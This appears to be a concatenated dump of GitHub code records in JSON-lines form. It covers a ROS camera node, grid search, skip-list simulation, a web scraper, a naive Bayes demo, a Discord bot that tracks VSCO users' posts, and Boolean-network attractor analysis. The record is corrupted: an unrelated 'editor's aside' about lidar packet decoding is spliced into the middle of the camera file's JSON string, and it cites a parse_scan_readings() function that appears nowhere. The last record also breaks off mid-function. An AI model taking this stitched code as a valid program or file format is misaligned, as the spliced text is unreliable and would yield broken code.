+{"seq_id":"72670418980","text":"#!/usr/bin/env python3\n# modified on the basis of https://github.com/duckietown/dt-duckiebot-interface/blob/daffy/packages/camera_driver/src/camera_node.py\n\nimport os\nimport rospy\nimport cv2\nimport atexit\nimport numpy as np\nfrom threading import Thread\n\nfrom duckietown.dtros import DTROS, NodeType\nfrom sensor_msgs.msg import CompressedImage, CameraInfo\nfrom sensor_msgs.srv import SetCameraInfo, SetCameraInfoResponse\nfrom cv_bridge import CvBridge\n\n\nclass CameraPub(DTROS):\n\n    def __init__(self, node_name):\n        # initialize the DTROS parent class\n        super(CameraPub, self).__init__(node_name=node_name, node_type=NodeType.GENERIC)\n        # construct publisher\n        \n        self.pub_img = rospy.Publisher('~image/compressed', \n                                       CompressedImage, \n                                       queue_size=1\n                                       )\n        \n        # self.pub_camera_info = rospy.Publisher(\n        #     \"~camera_info\",\n        #     CameraInfo,\n        #     queue_size=1\n        # ) \n        # frame id stamped onto published images in run(); a simple placeholder,\n        # since the upstream driver derives it from the vehicle name\n        self.frame_id = node_name\n        self.value = np.empty((480, 640, 3), dtype=np.uint8)\n        self.cap = cv2.VideoCapture(2)\n        \n        # open camera if not already open\n        if not self.cap.isOpened():\n            self.start_camera()\n        \n        # test if camera opened\n        re, image = self.cap.read()\n        if not re:\n            raise RuntimeError(\"Could not read image from camera.\")\n        \n    def start_camera(self):\n        if not self.cap.isOpened():\n            self.cap.open(2)\n\n    
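# --- editor's aside ------------------------------------------------------------
# A standalone check (synthetic packet, not captured data) of the 5-byte scan
# decode in parse_scan_readings() above: the angle arrives in 1/64-degree units,
# the distance in 1/4-millimetre units.
def decode(raw: bytes):
    angle = ((raw[1] >> 1) + (raw[2] << 7)) / 64.0
    distance = (raw[3] + (raw[4] << 8)) / 4.0
    return angle, distance

angle_q6 = 90 * 64                          # encode 90 degrees
raw = bytes([0b00000101,                    # quality=1, new-scan bit set
             ((angle_q6 & 0x7F) << 1) | 1,  # low 7 angle bits + check bit
             angle_q6 >> 7,                 # high angle bits
             0x00, 0x10])                   # distance 0x1000 -> 1024.0 mm
angle, distance = decode(raw)
assert angle == 90.0 and distance == 1024.0
# -------------------------------------------------------------------------------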
def stop_camera(self):\n if hasattr(self, 'cap'):\n self.cap.release()\n\n def __del__(self):\n self.stop_camera()\n super(CameraPub, self).__del__()\n\n def run(self):\n \n bridge = CvBridge()\n\n while(1):\n re, image = self.cap.read()\n\n if image is not None:\n image = np.uint8(image)\n \n stamp = rospy.Time.now()\n image_message = bridge.cv2_to_compressed_imgmsg(image, dst_format='jpeg')\n \n #not sure if this actualy does something/ gets published\n image_message.header.stamp = stamp\n image_message.header.frame_id = self.frame_id\n\n #Publish the compressed image\n self.pub_img.publish(image_message)\n\n # # Publish the CameraInfo message \n # self.current_camera_info.header.stamp = stamp\n # self.pub_camera_info.publish(self.current_camera_info)\n rospy.sleep(rospy.Duration.from_sec(0.001))\n\n\n\nif __name__ == '__main__':\n # create the node\n node = CameraPub(node_name='camerapub')\n # run node\n frame_thread = Thread(target=node.run)\n frame_thread.start()\n # keep spinning\n rospy.spin()","repo_name":"SgtVincent/duckietown-exer21-simple-publisher","sub_path":"packages/camera_publisher/src/camerapub.py","file_name":"camerapub.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31398845451","text":"from queue import Queue\n\ndef shortestPath(grid, s):\n m, n = len(grid), len(grid[0])\n path_count = 0\n nodes_left_in_layer = 1\n nodes_in_next_level = 0\n reached_end = False\n visited = [[0 for i in range(n)] for j in range(m)]\n dr = [-1,1,0,0]\n dc = [0,0,1,-1]\n next_nodes = Queue()\n next_nodes.put(s)\n visited[s[0]][s[1]] = True\n while not next_nodes.empty():\n next_node = next_nodes.get()\n print(next_node)\n if grid[next_node[0]][next_node[1]] == 'E':\n reached_end = True\n print(\"in while\")\n break\n print(reached_end)\n for i in range(4):\n rr = next_node[0] + dr[i]\n cc = next_node[1] + dc[i]\n if rr < 0 or cc <0:\n continue\n if rr>=m or cc>=n:\n continue\n if visited[rr][cc]:\n continue\n if grid[rr][cc] == '#':\n continue\n next_nodes.put((rr,cc))\n visited[rr][cc] = True\n nodes_in_next_level += 1\n print(nodes_in_next_level)\n nodes_left_in_layer -= 1\n print(\"left\",nodes_left_in_layer)\n if nodes_left_in_layer == 0:\n nodes_left_in_layer = nodes_in_next_level\n nodes_in_next_level = 0\n path_count+=1\n if reached_end:\n return path_count\n return -1\n\ngrid = [['S', '.', '.', '#', '.', '.', '.'],\n ['.', '#', '.', '.', '.', '#', '.'],\n ['.', '#', '.', '.', '.', '.', '.'],\n ['.', '.', '#', '#', '.', '.', '.'],\n ['#', '.', '#', 'E', '.', '#', '.'],\n ]\n\ngrid1 = [\n ['S', '#', '#'],\n ['.', '#', '#'],\n ['.', 'E', '.']\n]\n\nprint(grid)\nret = shortestPath(grid1, (0,0))\nprint(\"aNSWER\", ret)","repo_name":"nsjethani/Python","sub_path":"DSandALGOs/BFS_shortest_path_grid.py","file_name":"BFS_shortest_path_grid.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71120280100","text":"from __future__ import print_function\nimport simpy\nimport random\nimport sys, os\nfrom statistics import mean\nfrom hwsim_utils import HW_sim_object\nfrom pifo_skip_list import SkipList as SkipList_prob\nfrom det_skip_list_simpy import SkipList as SkipList_det\n\nclass SkipListWrapper(HW_sim_object):\n \n def __init__(self, env, enq_in_pipe, enq_out_pipe, deq_in_pipe, deq_out_pipe, num_sl, period, size, outreg_width, enq_fifo_depth, rd_latency, wr_latency, sl_impl, 
outreg_latency):\n        HW_sim_object.__init__(self, env, period)\n        self.num_sl = num_sl\n        self.enq_in_pipe = enq_in_pipe\n        self.enq_out_pipe = enq_out_pipe\n        self.deq_in_pipe = deq_in_pipe\n        self.deq_out_pipe = deq_out_pipe\n\n        self.sl = []\n        self.num_entries = 0\n        \n        for i in range(num_sl):\n            if sl_impl == 'prob':\n                sl = SkipList_prob(env, self.period, size, outreg_width, enq_fifo_depth, rd_latency, wr_latency, outreg_latency)\n            elif sl_impl == 'det':\n                sl = SkipList_det(env, self.period, size, outreg_width, enq_fifo_depth, rd_latency, wr_latency, outreg_latency)\n            else:\n                print('ERROR: unsupported skipList implementation type: {}'.format(sl_impl), file=sys.stderr)\n                sys.exit(1)\n            self.sl.append(sl)\n\n        # register processes for simulation\n        self.run(env)\n\n    def run(self, env):\n        self.env.process(self.enqueue())\n        self.env.process(self.dequeue())\n\n    def enqueue(self):\n        while True:\n            # wait for enqueue command\n            enq_req = yield self.enq_in_pipe.get()\n            \n            t1 = self.env.now\n            # Select the skip list w/ min number of entries among the ready (not busy) skip lists\n            sel_sl = None\n            while sel_sl == None:\n                for i in range(self.num_sl):\n                    if (self.sl[i].busy == 0 and self.sl[i].outreg.busy == 0):\n                        if sel_sl == None:\n                            sel_sl = i\n                            min_num_entries = self.sl[i].num_entries\n                        else:\n                            if self.sl[i].num_entries < min_num_entries:\n                                sel_sl = i\n                                min_num_entries = self.sl[i].num_entries\n                # All skip lists busy, try again\n                if sel_sl == None:\n                    yield self.env.timeout(self.period)\n            # Send enqueue request to selected skip list\n            self.sl[sel_sl].enq_in_pipe.put(enq_req)\n            yield self.env.timeout(self.period)\n            self.num_entries += 1\n            self.enq_out_pipe.put(self.env.now - t1)\n\n    def dequeue(self):\n        while True:\n            # wait for dequeue request\n            deq_req = yield self.deq_in_pipe.get()\n            if self.num_entries > 0:\n                self.num_entries -= 1\n            else:\n                print (\"ERROR: Dequeue from empty PIFO!\")\n                continue\n            \n            t1 = self.env.now\n            # From non-empty skip lists/regs, select the one with the min value\n            sel_sl = None\n            while sel_sl == None:\n                for i in range(self.num_sl):\n                    # Wait until out reg has valid data if there's data in the skip list\n                    while (self.sl[i].num_entries > 0 and self.sl[i].outreg.next_valid == 0):\n                        yield self.env.timeout(self.period)\n                    if self.sl[i].outreg.next_valid == 1:\n                        if sel_sl == None:\n                            sel_sl = i\n                            min_value = self.sl[i].outreg.next\n                        else:\n                            if self.sl[i].outreg.next < min_value:\n                                sel_sl = i\n                                min_value = self.sl[i].outreg.next\n                if sel_sl == None:\n                    yield self.env.timeout(self.period)\n            # Send dequeue request to selected skip list\n            self.sl[sel_sl].deq_in_pipe.put(deq_req)\n            (deq_val, deq_hsp, deq_mdp, deq_nclks) = yield self.sl[sel_sl].deq_out_pipe.get()\n            # Update deq nclks\n            deq_nclks = self.env.now - t1\n            self.deq_out_pipe.put((deq_val, deq_hsp, deq_mdp, deq_nclks))\n\n","repo_name":"PIFO-TM/PIFO-NetFPGA","sub_path":"sw/python_sims/pifo_wrapper.py","file_name":"pifo_wrapper.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"29514885209","text":"t = int(input())\nfor _ in range(t):\n    n = int(input())\n    wear = {}\n    for _ in range(n):\n        name, kind = input().split()\n        wear[kind] = wear.get(kind, 0) + 1\n\n    result = 1\n    for cnt in wear.values():\n        result *= (cnt + 1)\n    \n    result -= 1\n    
print(result)","repo_name":"yunhlim/TIL","sub_path":"algorithm/Baekjoon/S3_9375/S3_9375.py","file_name":"S3_9375.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8993284092","text":"import numpy as np\n\ndef paths(matrix):\n path=np.zeros(matrix.shape)\n if matrix[0][0]==0:\n path[0][0] =1\n\n # make entry in the first row and column of the path matrix\n for i in range(1,len(matrix)):\n if matrix[i][0]==0:\n path[i][0] = path[i-1][0]\n for i in range(1,len(matrix)):\n if matrix[0][i]==0:\n path[0][i]= path[0][i-1]\n\n for i in range(1,len(matrix)):\n for j in range(1,len(matrix)):\n if matrix[i][j]==0:\n path[i][j] = path[i][j-1] + path[i-1][j]\n\n return path[-1][-1]\n\nmap1 = [[0,0,0],\n [0,1,0],\n [0,0,0]]\nprint(\"The number of paths in the map\", map1, \" \\n is : \",paths(np.asarray(map1)))","repo_name":"nikhilcusc/LearningRepo","sub_path":"CountpathsMatrix.py","file_name":"CountpathsMatrix.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3901633169","text":"#Creating a Pandas DataFrame\nimport pandas as pd\nlst = ['Geeks', 'For', 'Geeks', 'is', 'portal', 'for', 'Geeks']\ndf=pd.DataFrame(lst)\n# print(df)\n\n\n#Creating DataFrame from dict of ndarray/lists\n\ndata = {'Name':['Tom', 'nick', 'krish', 'jack'],'Age':[20, 21, 19, 18]}\ndf=pd.DataFrame(data)\n# print(df)\n\n\n#Dealing with Rows and Columns\n#Selecting Colum to be displayed\n\ndata = {'Name':['Jai', 'Princi', 'Gaurav', 'Anuj'],'Age':[27, 24, 22, 32],'Address':['Delhi', 'Kanpur', 'Allahabad', 'Kannauj'],'Qualification':['Msc', 'MA', 'MCA', 'Phd']}\ndf=pd.DataFrame(data)\n# print(df)\n\n\ndic={\n \"engagedly-services\": \"staging_july_2109\",\n \"enquete\": \"engagedly_UI_revised_staging__config_as_env_var\",\n \"audit-subscriber\": \"staging_july_2109\",\n \"augadh\": \"qa_dec_2019\",\n \"bharga\": \"events_common_branch\",\n \"durjaya\": \"engagedly_UI_revised_staging_config_as_env_var\",\n \"eauth-services\": \"staging_july_2109_config_as_env_var\",\n \"ekaksha\": \"engagedly_UI_revised_staging_config_as_env_var\",\n \"elastic-interface\": \"engagedly_UI_revised_staging_ebm_nov_config_as_env_var\",\n \"engagedly\": \"engagedly_UI_revised_ebm_dec_config_as_env_var\",\n \"faye-server\": \"staging_july_2109\",\n \"advaya\": \"engagedly_UI_revised_staging_config_as_env_var\",\n \"aja\": \"es6_data_push\",\"ananta\": \"develop\",\n \"anmolhrm\": \"engagedly_UI_revised_abhinev_staging_ebm_dec_config_as_env_var\",\n \"api-gateway\": \"staging_july_2109_config_as_env_var\",\n\n\n\n}\nkey_list=list(dic.keys())\nvalue_list=list(dic.values())\n# print(key_list)\n# print(value_list)\ndic={}\ndic[\"application\"]=key_list\ndic[\"branch\"]=value_list\n# print(dic)\ndf=pd.DataFrame(dic)\ndf.sort_values(by=['application'], ascending=True,)\ndf.reset_index(drop=True,inplace=True)\n# print(df)\nrows,column=df.shape\n# print(\" number os rows is \"+ str(rows)+\" \\n\"+ \"number of column is \"+ str(column))\n\n# print(df.head(2))\n# print(df[4:7])\n# print(df.columns)\n# print(df[\"application\"])\n# print(type(df[\"branch\"]))\nprint(df[\"application\"])","repo_name":"Pra9jha/ML","sub_path":"Creating_a_DataFrame.py","file_name":"Creating_a_DataFrame.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1985686134","text":"from 
collections import defaultdict\nimport itertools as it\nimport time\n\nimport intcomp\n\n\ntiles = {\n    0: \" \",\n    1: \"#\",\n    2: \"¤\",\n    3: \"^\",\n    4: \"o\",\n}\n\nincodes = {\n    \"a\": -1,\n    \"s\": 0,\n    \"d\": 1,\n    \"\": 0,\n}\n\n\ndef parse_tile(t):\n    pos = t[0] + t[1] * 1j\n    return pos, t[2]\n\n\ndef render(universe):\n    score = universe[-1]\n    print(f\"Score: {score}\")\n    max_x = int(max(map(lambda i: i.real, universe)))\n    max_y = int(max(map(lambda i: i.imag, universe)))\n\n    for y in range(max_y + 1):\n        for x in range(max_x + 1):\n            print(tiles[universe[x + y * 1j]], end=\"\")\n        print()\n\n\ndef super_smart_ai(universe):\n    reverse_universe = dict(map(reversed, universe.items()))\n    ball = reverse_universe[4]\n    paddle = reverse_universe[3]\n\n    diff = ball.real - paddle.real\n\n    if diff > 0:\n        return 1\n    if diff < 0:\n        return -1\n    return 0\n\n\ndef get_universe(tiles):\n    universe = defaultdict(int)\n    universe.update(map(parse_tile, zip(*([iter(tiles)] * 3))))\n    return universe\n\n\ndef part1():\n    program = open(\"in\").read().strip()\n    computer = intcomp.Computer()\n    computer.run(program)\n    tiles = computer.join()\n\n    universe = get_universe(tiles)\n\n    render(universe)\n\n    return len(list(filter(lambda i: i==2, universe.values())))\n\n\ndef part2():\n    program = open(\"in\").read().strip()\n    program = \"2,\" + program[2:]\n    computer = intcomp.Computer()\n    computer.run(program)\n\n    universe = defaultdict(int)\n    time.sleep(1)\n\n    while True:\n        if not computer.process.is_alive():\n            break\n\n        time.sleep(0.04)\n        tiles = computer.get_all()\n\n        universe.update(get_universe(tiles))\n        render(universe)\n\n        computer.input(super_smart_ai(universe))\n\n\n    return len(list(filter(lambda i: i==2, universe.values())))\n\n\nprint(f\"Part 1: {part1()}\")\npart2()\n","repo_name":"netrome/aoc2019","sub_path":"13/m.py","file_name":"m.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"619730954","text":"# -*- coding:utf-8 -*-\nimport scrapy\nfrom job.items import JobItem, DescItem\nimport sys\nimport logging\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\nclass Job51Spider(scrapy.Spider):\n    name = 'job51'\n    allowed_domains = ['www.51job.com', 'jobs.51job.com']\n    start_urls = [\n        'https://search.51job.com/list/040000%252C030200,000000,0000,00,9,99,%25E6%2595%25B0%25E6%258D%25AE%25E6%258C%2596%25E6%258E%2598,2,{}.html?lang=c&stype=1&postchannel=0000&workyear=99&cotype=99&degreefrom=99&jobterm=99&companysize=99&lonlat=0%2C0&radius=-1&ord_field=0&confirmdate=9&fromType=&dibiaoid=0&address=&line=&specialarea=00&from=&welfare='.format(\n            i) for i in range(1, 14)]\n\n    def parse(self, response):\n        node_list = response.xpath(\"//div[@class='el' and not(@id)]\")\n\n        for node in node_list:\n            item = JobItem()\n\n            item[\"position_name\"] = node.xpath(\"./p[@class='t1 ']/span/a/@title\").extract_first()\n            item[\"position_link\"] = node.xpath(\"./p[@class='t1 ']/span/a/@href\").extract_first()\n            item[\"company_name\"] = node.xpath(\"./span[@class='t2']/a/@title\").extract_first()\n            item[\"postiton_pay\"] = node.xpath(\"./span[@class='t4']/text()\").extract_first()\n            item[\"work_location\"] = node.xpath(\"./span[@class='t3']/text()\").extract_first()\n            item[\"publish_times\"] = node.xpath(\"./span[@class='t5']/text()\").extract_first()\n            yield item\n            # item objects are handed to the item pipeline (which we implement ourselves)\n            # Request objects are handed to the scheduler (already implemented by the framework)\n            logging.info(item['position_link'])\n            logging.info(type(item['position_link']))\n            yield 
scrapy.Request(item['position_link'], callback=self.parse_page)\n            # yield item\n\n    def parse_page(self, response):\n        item = DescItem()\n        # print response\n        tl = response.xpath(\"//div[@class='bmsg job_msg inbox']//text()\").extract()\n        ts = ''.join(tl)\n        logging.info(type(ts))\n        ts = ts.replace('\\n', '').replace('\\t', '').strip().split('分享')\n        logging.info(ts[0])\n        logging.debug('The data type is: {}'.format(type(ts[0])))\n        item[\"position_desc\"] = ts[0]\n        logging.info('The item is {}'.format(item['position_desc']))\n        item[\"position_demand\"] = ''\n        yield item\n","repo_name":"alige32/51job-datamining","sub_path":"job/spiders/job51.py","file_name":"job51.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"14356579190","text":"\"\"\"\nPerson router\n\"\"\"\n\nfrom fastapi import APIRouter, HTTPException, Request, Response\nfrom tmdb.tmdb_api import TmdbApi\n\nrouter = APIRouter(prefix=\"/person\", tags=[\"Person\"])\n\n@router.get(\"/{personId}\")\nasync def getDetails(req: Request, res: Response):\n    \"\"\"Gets details of person\"\"\"\n    personId = req.path_params['personId']\n    \n    res = await TmdbApi.person_detail(personId)\n    return res\n\n@router.get(\"/{personId}/movies\")\nasync def getMovies(req: Request, res: Response):\n    \"\"\"Gets a list of films the cast member has starred in\"\"\"\n    personId = req.path_params['personId']\n    \n    res = await TmdbApi.person_movies(personId)\n    return res\n\n@router.get(\"/search\")\nasync def getSearchResult(req: Request, res: Response):\n    \"\"\"Gets search result\"\"\"\n    query = req.query_params.get('query')\n    page = req.query_params.get('page')\n    \n    res = await TmdbApi.person_search(query, page)\n\n    return res\n","repo_name":"james7089/CM3202-Film-Recommendation-System","sub_path":"web_app/backend/api/api_v1/endpoints/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28313208319","text":"# coding=utf-8\r\n\r\nimport numpy as np\r\n\r\n\r\nclass NaiveBayesian(object):\r\n    def __init__(self, alpha):\r\n        self.classP = dict()\r\n        self.classP_feature = dict()\r\n        self.alpha = alpha  # smoothing factor\r\n\r\n    def createData(self):\r\n        data = np.array(\r\n            [\r\n                [320, 204, 198, 265],\r\n                [253, 53, 15, 2243],\r\n                [53, 32, 5, 325],\r\n                [63, 50, 42, 98],\r\n                [1302, 523, 202, 5430],\r\n                [32, 22, 5, 143],\r\n                [105, 85, 70, 322],\r\n                [872, 730, 840, 2762],\r\n                [16, 15, 13, 52],\r\n                [92, 70, 21, 693],\r\n            ]\r\n        )\r\n\r\n        labels = np.array([1, 0, 0, 1, 0, 0, 1, 1, 1, 0])\r\n        return data, labels\r\n\r\n    def gaussian(self, mu, sigma, x):\r\n        return 1.0 / (sigma * np.sqrt(2 * np.pi)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\r\n\r\n    def calMuAndSigma(self, feature):\r\n        mu = np.mean(feature)\r\n        sigma = np.std(feature)\r\n        return mu, sigma\r\n\r\n    def train(self, data, labels):\r\n        numData = len(labels)\r\n        numFeatures = len(data[0])\r\n\r\n        # probability that a user is anomalous\r\n        self.classP[1] = (\r\n            (sum(labels) + self.alpha) * 1.0 / (numData + self.alpha * len(set(labels)))\r\n        )\r\n        # probability that a user is not anomalous\r\n        self.classP[0] = 1 - self.classP[1]\r\n\r\n        # stores the mean and variance of the Gaussian for each feature under each label\r\n        self.classP_feature = dict()\r\n        # iterate over each label\r\n        for c in set(labels):\r\n            self.classP_feature[c] = {}\r\n            for i in range(numFeatures):\r\n                # numpy boolean indexing\r\n                feature = data[np.equal(labels, c), i]\r\n                self.classP_feature[c][i] = self.calMuAndSigma(feature)\r\n\r\n    def predict(self, x):\r\n        # predict whether the new user is anomalous\r\n        label = 
-1\r\n        maxP = 0\r\n\r\n        for key in self.classP.keys():\r\n            # compute the posterior probability\r\n            label_p = self.classP[key]\r\n            currentP = 1.0\r\n            feature_p = self.classP_feature[key]\r\n            j = 0\r\n            for fp in feature_p.keys():\r\n                currentP *= self.gaussian(feature_p[fp][0], feature_p[fp][1], x[j])\r\n                j += 1\r\n\r\n            if currentP * label_p > maxP:\r\n                maxP = currentP * label_p\r\n                label = key\r\n\r\n        return label\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    nb = NaiveBayesian(1.0)\r\n    data, labels = nb.createData()\r\n    nb.train(data, labels)\r\n    labels = nb.predict(np.array([134, 84, 235, 349]))\r\n    print(\"Behavior data of the unknown user: [134,84,235,349]; the most likely user type is: {}\".format(labels))\r\n","repo_name":"JJXiangJiaoJun/RecommendationSystem","sub_path":"DataMining/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"31102891653","text":"#!/usr/bin/env python3\n\nimport json\nimport locale\nimport sys\nimport emails\nimport reports\nimport os\nfrom datetime import datetime\n\n#will vary\nstudent = os.environ.get('USER')\n#description directory\ndir = r\"/home/{}/supplier-data/descriptions\".format(student)\n\ndef main(argv):\n    \"\"\"Process the descriptions and generate a full report out of it. Done in 2 parts\"\"\"\n    \n    \"\"\"Part 1. Iterate over descriptions dir and generate summary from text files\"\"\"\n    summary = \"\"\n    for file in os.listdir(dir): # iterate over the dir\n        f, e = os.path.splitext(file) # find out the file extension\n        if e == \".txt\": # if it's a text file\n            with open(os.path.join(dir, file), 'r') as f:\n                summary += \"<br/>\"#line break\n                summary += \"name: {}<br/>\".format(f.readline())\n                summary += \"weight: {}<br/>\".format(f.readline())\n\n    \"\"\"Part 2. Generate report\"\"\"\n    today = str(datetime.date(datetime.now()))\n    reports.generate(\"/tmp/processed.pdf\", \"Processed Update on \"+today, summary)\n\n    #send the PDF report as an email attachment\n    sender = \"automation@example.com\"\n    receiver = \"{}@example.com\".format(student)\n    subject = \"Upload Completed - Online Fruit Store\"\n    body = 'All fruits are uploaded to our website successfully. A detailed list is attached to this email.'\n    message = emails.generate(sender, receiver, subject, body, \"/tmp/processed.pdf\") # creates email\n    emails.send(message)\n\n\nif __name__ == \"__main__\":\n    main(sys.argv)","repo_name":"earthsoul/Automate-updating-catalog-information-","sub_path":"Generate a PDF report and send it through email.py","file_name":"Generate a PDF report and send it through email.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12229501955","text":"from urllib import response\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport discord\r\nimport asyncio\r\nfrom discord.ext import commands\r\nimport datetime\r\nimport json\r\n\r\nbot = commands.Bot(command_prefix='$')\r\n\r\ns = requests.Session()\r\n\r\nwith open(\"settings.json\") as f:\r\n    settings = json.load(f)\r\n\r\nwith open(\"users.json\") as f:\r\n    data = json.load(f)\r\n    \r\ndef updatejson(user, id):\r\n    data[user] = id\r\n    with open(\"users.json\", \"w\") as f:\r\n        json.dump(data, f, indent=4)\r\n\r\ndef removejson(user):\r\n    del data[user]\r\n    with open(\"users.json\", \"w\") as f:\r\n        json.dump(data, f, indent=4)\r\n    \r\n\r\nasync def executeWebhook(username, image_link, id):\r\n    embed = discord.Embed(title=f\"{username} just posted! 
\", color=0xDCD0FF)\r\n embed.add_field(name=\"URLs\", value=f'[Post](https://vsco.co/{username}/media/{id})\\n[Profile](https://vsco.co/{username}/gallery)', inline=False)\r\n embed.set_image(url=image_link)\r\n embed.set_footer(text=f\"{datetime.datetime.now()}\")\r\n channel = bot.get_channel(int(settings[\"monitor_channel\"]))\r\n\r\n await channel.send(embed=embed)\r\n\r\nheaders = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"accept-encoding\": \"gzip, deflate, br\",\r\n \"cache-control\": \"max-age=0\",\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\",\r\n \"sec-ch-ua\": '\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"'\r\n}\r\n\r\nasync def getting_recent():\r\n print(f'Fetching Recent Posts | {time.time()}')\r\n for entry in data:\r\n response = s.get(\r\n f'https://vsco.co/{entry}/gallery', \r\n headers=headers\r\n )\r\n\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n # get the value inside of the tag with the attribute property=\"og:image\"\r\n image_url = soup.find('meta', property='og:image')['content']\r\n id = image_url.split('/')[-2]\r\n \r\n #checking if the most recent post ID matches the last ID that the bot fetched\r\n\r\n if data[entry] == \"null\":\r\n updatejson(entry, id)\r\n await executeWebhook(entry, image_url, id)\r\n else:\r\n if data[entry] != id:\r\n updatejson(entry, id)\r\n await executeWebhook(entry, image_url, id)\r\n print(f\"Fetching {entry} | {time.time()}\")\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f'Logged in as {bot.user.name}')\r\n while True:\r\n await getting_recent()\r\n await asyncio.sleep(5)\r\n\r\n@bot.command()\r\nasync def addprofile(ctx, arg):\r\n #adding profile to users.json for bot to loop through\r\n updatejson(arg, \"null\")\r\n await ctx.send(f'{arg} has been added to the database!')\r\n\r\n@bot.command()\r\nasync def removeprofile(ctx, arg):\r\n removejson(arg)\r\n await ctx.send(f'{arg} has been removed from the database!')\r\n\r\n@bot.command()\r\nasync def profiles(ctx):\r\n #listing all usernames in users.json\r\n await ctx.send('\\n'.join([x for x in data]))\r\n\r\nbot.run(settings[\"bot_token\"])","repo_name":"nunihalawi/discord-vsco-monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71744676902","text":"from python_files import BooleanNets as bn\nfrom python_files import EntropyMeasures as em\nimport numpy as np\nimport networkx as nx\nimport dit\nfrom itertools import product, combinations\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\n\n\ndef tup2str(tup): \n ''' Converts a tuple to a string to make labels for the statespace graph'''\n string = ''\n for t in tup: \n string += str(t)\n \n return string\n\ndef generate_positions(Graph,radius = 1): \n\n pos = {}\n N = len(Graph.nodes)\n for n, nodeID in enumerate(Graph.nodes): \n alpha = 2*np.pi*n/float(N)\n pos[nodeID] = np.array([radius*np.cos(alpha), radius*np.sin(alpha)])\n\n return pos\n\n\n\n\n#=============================================================================\n# ATTRACTOR FUNCTIONS\n#=============================================================================\n\ndef 
update_to_attractor(Net, start_vals = []): \n ''' Updates a Boolean network until it hits an attractor and returns the resulting update sequence, \n can either start from the networks current state or explicitly specify a start value'''\n \n if len(start_vals)!=0: \n Net.assign_values_to_nodes(value_list=start_vals)\n update_seq = []\n stop = False\n while not stop: \n update_seq.append(tuple(Net.CurrentValues.values()))\n Net.update_all()\n \n if len(update_seq) > len(list(set(update_seq))): \n stop = True\n return update_seq\n\n\n\ndef identify_attactors(Net): \n ''' finds the attractors of a boolean network by recursively removing all nodes without parents i.e \n all states that cannot be reached from other states.'''\n \n done = False \n start, stop = Net.calc_all_updates()\n start = [tuple(s) for s in start]\n stop = [tuple(s) for s in stop]\n \n while not done: \n \n attr_start = []\n attr_stop = []\n\n for state_idx, state in enumerate(start): \n if state in stop: \n attr_start.append(state)\n attr_stop.append(stop[state_idx])\n\n if len(list(set(attr_start))) == len(list(set(attr_stop))): \n done =True\n else: \n start = attr_start\n stop = attr_stop\n\n return attr_start, attr_stop\n\n\ndef find_basins_of_attraction(Net, verbose=False):\n \n '''Finds the basin of attraction for each attractor by recursively traversing all incoming states. \n Returns a dictionary where the keys are the attractors and the values are lists of incoming states.'''\n \n #make attractor list\n cycles = Net.scan_state_space()\n start, stop = Net.calc_all_updates()\n start = [tuple(s) for s in start]\n stop = [tuple(s) for s in stop]\n attractors = []\n\n for length in cycles.keys(): \n if length==0: \n for attractor in cycles[length]: \n attractors.append((length, attractor[0]))\n else: \n for attractor in cycles[length]: \n print(attractor)\n attractors.append((length, attractor[0]))\n \n \n # find basin of attraction for each attractor\n Basins = {}\n for attractor in attractors: \n done = False\n Basin = [] # list of elements in the basin of attraction\n Inters = [attractor[1]] # each attractor is itsef a member of its basin of attraction\n \n\n while not done: \n # add the parents of each node in the basin \n inter_val = Inters[0]\n indices = [i for i, x in enumerate(stop) if x == inter_val]\n\n if len(indices) > 0: \n parents = [start[i] for i in indices]\n Inters.extend(parents)#[p for p in parents if p!= inter_val])\n \n # if the node's parents have been discovered, the node is added to the Basin list and the searh\n # continues with it's parents\n Basin.append(inter_val) \n Inters = [i for i in Inters if (i != inter_val) and (i not in Basin)]\n\n if len(Inters) == 0: \n done = True\n\n Basins[attractor] = Basin\n if verbose: \n print('(Attractor length, Attractor elements), Size of Basin')\n for key in Basins: 